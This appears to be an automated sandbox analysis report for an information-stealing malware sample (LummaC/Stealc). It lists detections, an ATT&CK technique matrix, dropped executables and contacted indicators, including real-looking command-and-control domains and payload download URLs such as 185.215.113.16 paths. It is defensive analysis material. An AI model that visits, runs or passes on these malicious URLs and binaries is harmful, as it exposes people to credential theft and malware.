Source: Yara match	File source: 00000023.00000002.3474117746.0000000000692000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.3017322242.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 53f7160658.exe PID: 6972, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match

File source: dump.pcap, type: PCAP

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_0075EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,		5_2_0075EC48
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_0075DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,		5_2_0075DF51

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	1 Access Token Manipulation	11 Deobfuscate/Decode Files or Information	11 Input Capture	4 File and Directory Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	11 Scheduled Task/Job	212 Process Injection	31 Obfuscated Files or Information	Security Account Manager	248 System Information Discovery	SMB/Windows Admin Shares	11 Input Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	11 Scheduled Task/Job	11 Registry Run Keys / Startup Folder	11 Scheduled Task/Job	121 Software Packing	NTDS	851 Security Software Discovery	Distributed Component Object Model	Input Capture	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	Network Logon Script	11 Registry Run Keys / Startup Folder	1 DLL Side-Loading	LSA Secrets	12 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	271 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	271 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	11 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	212 Process Injection	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	56%	Virustotal		Browse
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\main\extracted\in.exe	100%	Avira	HEUR/AGEN.1352802
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Temp\1016495001\3f0b27a17c.exe	100%	Avira	TR/ATRAPS.Gen
C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Temp\1016494001\c3fed0b086.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	100%	Avira	HEUR/AGEN.1352802
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe	100%	Avira	TR/ATRAPS.Gen
C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\main\extracted\in.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1016495001\3f0b27a17c.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1016494001\c3fed0b086.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1016496001\318ea9f50d.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	88%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	47%	ReversingLabs	Win32.Trojan.Symmi
C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	47%	ReversingLabs	Win32.Trojan.Symmi
C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	88%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	50%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\main\7z.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\main\7z.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\main\extracted\in.exe	67%	ReversingLabs	Win64.Trojan.Nekark
C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	67%	ReversingLabs	Win64.Trojan.Nekark

Source	Detection	Scanner	Label	Link
http://31.41.244.11/files/kosodium/random.exed0Zo	0%	Avira URL Cloud	safe
https://sordid-snaked.cyou/apiQ	100%	Avira URL Cloud	malware
http://185.215.113.16/off/random.exeb15e	0%	Avira URL Cloud	safe
https://wrathful-jammy.cyou/X	100%	Avira URL Cloud	malware
https://sordid-snaked.cyou/apiU	100%	Avira URL Cloud	malware
aspecteirs.lat	0%	Avira URL Cloud	safe
https://sweepyribs.lat/api	0%	Avira URL Cloud	safe
https://effecterectz.xyz/apik	100%	Avira URL Cloud	malware
sweepyribs.lat	0%	Avira URL Cloud	safe
http://185.215.113.16/off/random.exeu	0%	Avira URL Cloud	safe
https://sordid-snaked.cyou/apiQ	19%	Virustotal		Browse
http://185.215.113.16/off/random.exec6139FmFoE	0%	Avira URL Cloud	safe
https://deafeninggeh.biz/apii	100%	Avira URL Cloud	malware
sustainskelet.lat	0%	Avira URL Cloud	safe
rapeflowwj.lat	0%	Avira URL Cloud	safe
https://sweepyribs.lat/apione	0%	Avira URL Cloud	safe
http://185.215.113.16/luma/random.exe;	0%	Avira URL Cloud	safe
http://185.215.113.16/off/random.exeP	0%	Avira URL Cloud	safe
http://185.215.113.16/off/random.exeT	0%	Avira URL Cloud	safe
http://185.215.113.16/off/random.exeV	0%	Avira URL Cloud	safe
http://185.215.113.16/off/random.exeY	0%	Avira URL Cloud	safe
energyaffai.lat	0%	Avira URL Cloud	safe
http://185.215.113.16/off/random.exe0	0%	Avira URL Cloud	safe
http://185.215.113.16/steam/random.exeencoded	0%	Avira URL Cloud	safe
http://185.215.113.16/off/random.exe1	0%	Avira URL Cloud	safe
http://31.41.244.11/files/martin/random.exez	0%	Avira URL Cloud	safe
http://185.215.113.16/off/random.exe4c61395d7jm	0%	Avira URL Cloud	safe
http://185.215.113.16/well/random.exeP	0%	Avira URL Cloud	safe
http://31.41.244.11/files/kosodium/random.exew0Mo	0%	Avira URL Cloud	safe
http://185.215.113.43/Zu7JuNko/index.php0j	100%	Avira URL Cloud	malware
http://185.215.113.16/off/random.exe16496001	0%	Avira URL Cloud	safe
http://185.215.113.16/well/random.exeW	0%	Avira URL Cloud	safe
https://wrathful-jammy.cyou/B	100%	Avira URL Cloud	malware
grannyejh.lat	0%	Avira URL Cloud	safe
https://diffuculttan.xyz/apiG	100%	Avira URL Cloud	malware
http://185.215.113.16/well/random.exe61coded	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
example.org	93.184.215.14	true	false	high
prod.detectportal.prod.cloudops.mozgcp.net	34.107.221.82	true	false	high
services.addons.mozilla.org	151.101.65.91	true	false	high
immureprech.biz	104.131.68.180	true	false	high
deafeninggeh.biz	178.62.201.34	true	false	high
contile.services.mozilla.com	34.117.188.166	true	false	high
prod.content-signature-chains.prod.webservices.mozgcp.net	34.160.144.191	true	false	high
fivetk5pn.top	104.154.220.71	true	false	high
us-west1.prod.sumo.prod.webservices.mozgcp.net	34.149.128.2	true	false	high
ipv4only.arpa	192.0.0.170	true	false	high
prod.ads.prod.webservices.mozgcp.net	34.117.188.166	true	false	high
push.services.mozilla.com	34.107.243.93	true	false	high
www.google.com	142.250.181.132	true	false	high
normandy-cdn.services.mozilla.com	35.201.103.21	true	false	high
httpbin.org	98.85.100.80	true	false	high
star-mini.c10r.facebook.com	157.240.195.35	true	false	high
prod.classify-client.prod.webservices.mozgcp.net	35.190.72.216	true	false	high
prod.balrog.prod.cloudops.mozgcp.net	35.244.181.201	true	false	high
twitter.com	104.244.42.193	true	false	high
plus.l.google.com	172.217.17.46	true	false	high
sweepyribs.lat	104.21.2.110	true	true	unknown
dyna.wikimedia.org	185.15.58.224	true	false	high
prod.remote-settings.prod.webservices.mozgcp.net	34.149.100.209	true	false	high
youtube.com	142.250.181.78	true	false	high
youtube-ui.l.google.com	142.250.181.14	true	false	high
steamcommunity.com	104.121.10.34	true	false	high
reddit.map.fastly.net	151.101.129.140	true	false	high
play.google.com	172.217.19.238	true	false	high
home.fivetk5pn.top	104.154.220.71	true	false	high
telemetry-incoming.r53-2.services.mozilla.com	34.120.208.123	true	false	high
sordid-snaked.cyou	unknown	unknown	false	high
www.reddit.com	unknown	unknown	false	high
spocs.getpocket.com	unknown	unknown	false	high
awake-weaves.cyou	unknown	unknown	false	high
content-signature-2.cdn.mozilla.net	unknown	unknown	false	high
support.mozilla.org	unknown	unknown	false	high
firefox.settings.services.mozilla.com	unknown	unknown	false	high
www.youtube.com	unknown	unknown	false	high
debonairnukk.xyz	unknown	unknown	false	high
diffuculttan.xyz	unknown	unknown	false	high
www.facebook.com	unknown	unknown	false	high
effecterectz.xyz	unknown	unknown	false	high
detectportal.firefox.com	unknown	unknown	false	high
wrathful-jammy.cyou	unknown	unknown	false	high
normandy.cdn.mozilla.net	unknown	unknown	false	high
shavar.services.mozilla.com	unknown	unknown	false	high
apis.google.com	unknown	unknown	false	high
www.wikipedia.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
aspecteirs.lat	true	Avira URL Cloud: safe	unknown
https://sweepyribs.lat/api	true	Avira URL Cloud: safe	unknown
http://185.215.113.43/Zu7JuNko/index.php	false		high
sweepyribs.lat	true	Avira URL Cloud: safe	unknown
sustainskelet.lat	true	Avira URL Cloud: safe	unknown
rapeflowwj.lat	true	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199724331900	false		high
https://immureprech.biz/api	false		high
energyaffai.lat	true	Avira URL Cloud: safe	unknown
grannyejh.lat	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://sordid-snaked.cyou/apiQ	e66237da20.exe, 00000006.00000002.2942229584.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	false	19%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	a98b6b83c7.exe, 00000025.00000003.3269273510.00000000057AB000.00000004.00000800.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3269471087.00000000057A8000.00000004.00000800.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3270029768.00000000057A8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://player.vimeo.com	e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	a98b6b83c7.exe, 00000025.00000003.3269273510.00000000057AB000.00000004.00000800.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3269471087.00000000057A8000.00000004.00000800.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3270029768.00000000057A8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#	skotes.exe, 00000005.00000002.3479841475.00000000011C8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp	e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/?subsection=broadcasts	e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	false		high
http://31.41.244.11/files/kosodium/random.exed0Zo	skotes.exe, 00000005.00000002.3479841475.000000000116E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sordid-snaked.cyou/apiU	e66237da20.exe, 00000006.00000002.2942229584.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://wrathful-jammy.cyou/X	e66237da20.exe, 00000006.00000002.2942229584.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16/off/random.exeb15e	skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/subscriber_agreement/	e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.gstatic.cn/recaptcha/	e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://deafeninggeh.biz/	e66237da20.exe, 00000006.00000003.2872487796.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://effecterectz.xyz/apik	e66237da20.exe, 00000006.00000003.2872487796.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com	e66237da20.exe, 00000006.00000002.2942229584.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.valvesoftware.com/legal.htm	e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en	e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com	e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://curl.se/docs/hsts.html	53fe16f582.exe, 00000024.00000003.3131028686.00000000071C5000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.google.com	e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/random.exeu	skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/off/random.exec6139FmFoE	skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://deafeninggeh.biz/apii	e66237da20.exe, 00000006.00000003.2872487796.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922133401.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/	e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl	e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis	e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T	e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922133401.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC	e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	false		high
https://diffuculttan.xyz/api	e66237da20.exe, 00000006.00000002.2942229584.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://s.ytimg.com;	e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922133401.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&	e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sweepyribs.lat/apione	a98b6b83c7.exe, 00000025.00000003.3323554306.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3299285071.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3324958727.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/	e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steam.tv/	e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#	skotes.exe, 00000005.00000002.3479841475.00000000011C8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=e	e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.j	e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/well/random.exe	skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/random.exeP	skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB	e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922133401.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en	e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/luma/random.exe;	skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/off/random.exeT	skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/off/random.exeV	skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://store.steampowered.com/privacy_agreement/	e66237da20.exe, 00000006.00000002.2942461187.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922133401.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/random.exeY	skotes.exe, 00000005.00000002.3479841475.0000000001158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/points/shop/	e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	a98b6b83c7.exe, 00000025.00000003.3269273510.00000000057AB000.00000004.00000800.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3269471087.00000000057A8000.00000004.00000800.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3270029768.00000000057A8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	a98b6b83c7.exe, 00000025.00000003.3324565962.0000000005828000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	a98b6b83c7.exe, 00000025.00000003.3324565962.0000000005828000.00000004.00000800.00020000.00000000.sdmp	false		high
https://curl.se/docs/alt-svc.html	53fe16f582.exe, 00000024.00000003.3131028686.00000000071C5000.00000004.00001000.00020000.00000000.sdmp	false		high
https://xmrig.com/wizard	Intel_PTT_EK_Recertification.exe, 0000001D.00000003.2985127530.000001D1F82E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2991295379.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Intel_PTT_EK_Recertification.exe, 00000026.00000003.3285632813.0000019A9EAE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.3342923144.00000001402DD000.00000002.00000001.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a	e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sketchfab.com	e66237da20.exe, 00000006.00000002.2942229584.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	a98b6b83c7.exe, 00000025.00000003.3269273510.00000000057AB000.00000004.00000800.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3269471087.00000000057A8000.00000004.00000800.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3270029768.00000000057A8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lv.queniujq.cn	e66237da20.exe, 00000006.00000002.2942229584.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199724331900/inventory/	e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922133401.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	a98b6b83c7.exe, 00000025.00000003.3327334681.0000000005A95000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.youtube.com/	e66237da20.exe, 00000006.00000002.2942229584.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	false		high
